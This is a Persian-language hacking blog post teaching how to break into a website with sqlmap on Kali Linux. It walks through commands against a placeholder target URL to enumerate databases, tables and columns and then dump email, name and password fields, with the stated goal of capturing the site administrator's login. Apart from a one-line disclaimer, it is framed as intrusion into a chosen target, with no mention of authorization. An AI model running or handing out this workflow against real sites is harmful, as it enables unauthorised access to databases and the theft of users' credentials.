H a K c i N G 32

هک و امنیت

H a K c i N G 32

هک و امنیت

https://t.me/hacking32 =ادرس کانال تلگرام ما
H a K c i N G 32
نویسندگان

آموزش هک سایت با sqlmap در کالی لینوکس

یکی از ابزارهای مشهور و پرکاربرد برای نفوذ به یک سایت sqlmap است ، که از آسیب پذیری ” Sql Injection ”  استفاده می شود.

اسکریپت sqlmap به زبان پایتون نوشته شده ، و اگر مفسر پایتون برای ویندوز نیز دانلود کنید؛می توانید مستقیم روی ویندوز نیز اجرا کنید.

اگر از کالی لینوکس استفاده می کنید ، نیاز نیست کار خاصی کنید ، چون sqlmap یکی از ابزار های پر بازدید اون هست و از قبل روی اون نصب هست.

ابتدا ترمینال را باز کرده و دستور زیر را وارد می کنیم.

sqlmap –u www.site.com/product.php?catid=5 --dbs

در اینجا منظور از site.com ادرس سایت هدف می باشد.

در اخر تارگت ما یک dbs وارد می کنیم تا دیتابیس های سایت رو برای ما بگیره.

sqlmap1

در حال حاضر ۲ دیتابیس پیدا کرده ، که دیتابیس دوم برای خود سیستم هست

sqlmap -u www.site.com/product.php?catid=5 -D acuart --tables

خب الا باید جدول ها رو بگیریم ، که از اون ها تیبل های مربوط به ورود مدیر سایت را پیدا کنیم.

sqlmap2

از دیتابیس acuart جدول زیر استخراج شده:

[۸ tables]

+———–+

| artists   |

| carts     |

| categ     |

| featured  |

| guestbook |

| pictures  |

| products  |

| users     |

+———–+

احتمال اینکه اطلاعات مدیر سایت در جدول users باشه زیاد هست ، بنابراین این جدول رو استخراج می کنیم.

sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users --columns

با دستور columns می توانیم ، ستون های یک جدول یا تیبل را بگیریم.

sqlmap2

همینطور که مشاهده می کنید ، ستون های جدول user رو گرفتیم و حالا با انتخاب ستون های منتخب می تونیم ، پسورد مدیر سایت رو استخراج کنیم.

sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users -C email,name,password -dump

sqlmap4

همین طور که می بینید ، اطلاعات مدیر سایت رو گرفتیم.

این آموزش جنبه آموزشی و ارتقاء سطح دانش هکرهای کلاه سفید می باشد ، درصورت سوء استفاده مسئولیت بر عهده شخص است.

منبع=hacking32.blog.ir

نظرات  (۰)

هیچ نظری هنوز ثبت نشده است
ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی